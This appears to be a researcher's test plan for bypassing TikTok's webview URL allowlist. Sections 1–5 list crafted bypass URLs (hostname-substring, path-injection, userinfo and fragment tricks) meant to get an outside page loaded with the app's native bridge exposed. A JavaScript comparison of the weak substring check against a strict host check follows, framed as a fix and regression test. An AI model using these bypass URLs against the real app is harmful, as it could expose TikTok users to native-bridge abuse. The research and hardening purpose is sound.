TikTok webview allowlist-bypass — lrd0036

Bare boguefala.us was blocked as "unsafe". The allowlist match is an indexOf (substring) check on hostname+pathname, so a URL that embeds an allowlisted token should slip past. WIN = the red PoC page renders inside TikTok. On the page, a populated webkit.messageHandlers means the native bridge was injected into our origin.

1 · baseline (should still be blocked)

webview?url=boguefala.us/poc (control)

2 · hostname-substring bypass (host contains "tiktok.com")

webview?url=tiktok.com.boguefala.us/poc
ad_webview?url=tiktok.com.boguefala.us/poc

3 · path-injection bypass (path contains allowlisted token)

…/tiktok.com
…/poc?x=tiktok.com
…/poc?x=.tiktokv.com
…/poc?x=webcast

4 · userinfo / fragment parser confusion

https://[email protected]/poc
…/poc#.tiktok.com

5 · controls

open tiktok.com.boguefala.us in Safari (should render)
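
The substring match described at the top, set beside a check on the parsed host, as an added example that is not code from this page or from TikTok. The token list (taken from the test cases above), the https:// prefixes, the allowed-domain policy and all function names are assumptions; the weak check models only what the page states (indexOf over hostname+pathname).

```javascript
// Tokens taken from the test cases on this page; the real list is not shown there.
const TOKENS = ["tiktok.com", ".tiktokv.com", "webcast"];
// Assumed policy for the hardened check: these domains and their subdomains only.
const ALLOWED_DOMAINS = ["tiktok.com", "tiktokv.com"];

function parse(raw) {
  try { return new URL(raw); } catch { return null; }
}

// Weak check as the page describes it: substring match on hostname + pathname.
function weakAllow(raw) {
  const u = parse(raw);
  if (!u) return false;
  const haystack = u.hostname + u.pathname;
  return TOKENS.some((t) => haystack.indexOf(t) !== -1);
}

// Hardened check: decide on the parsed host alone, matched on label boundaries.
function strictAllow(raw) {
  const u = parse(raw);
  if (!u || u.protocol !== "https:") return false;
  if (u.username || u.password) return false; // no userinfo in webview targets
  const host = u.hostname.toLowerCase().replace(/\.$/, ""); // drop trailing dot
  return ALLOWED_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

// Constructed inputs mirroring sections 1-3 above, plus two legitimate-host cases.
const SAMPLES = [
  "https://boguefala.us/poc",
  "https://tiktok.com.boguefala.us/poc",
  "https://boguefala.us/tiktok.com",
  "https://www.tiktok.com/foryou",
  "https://user@www.tiktok.com/foryou",
];

// Returns one row per URL with the verdict of each check.
function compare(urls = SAMPLES) {
  return urls.map((url) => ({ url, weak: weakAllow(url), strict: strictAllow(url) }));
}

console.table(compare());
```

Rows where `weak` is true and `strict` is false are the inputs a fix has to reject; the same table can serve as a regression test for the allowlist.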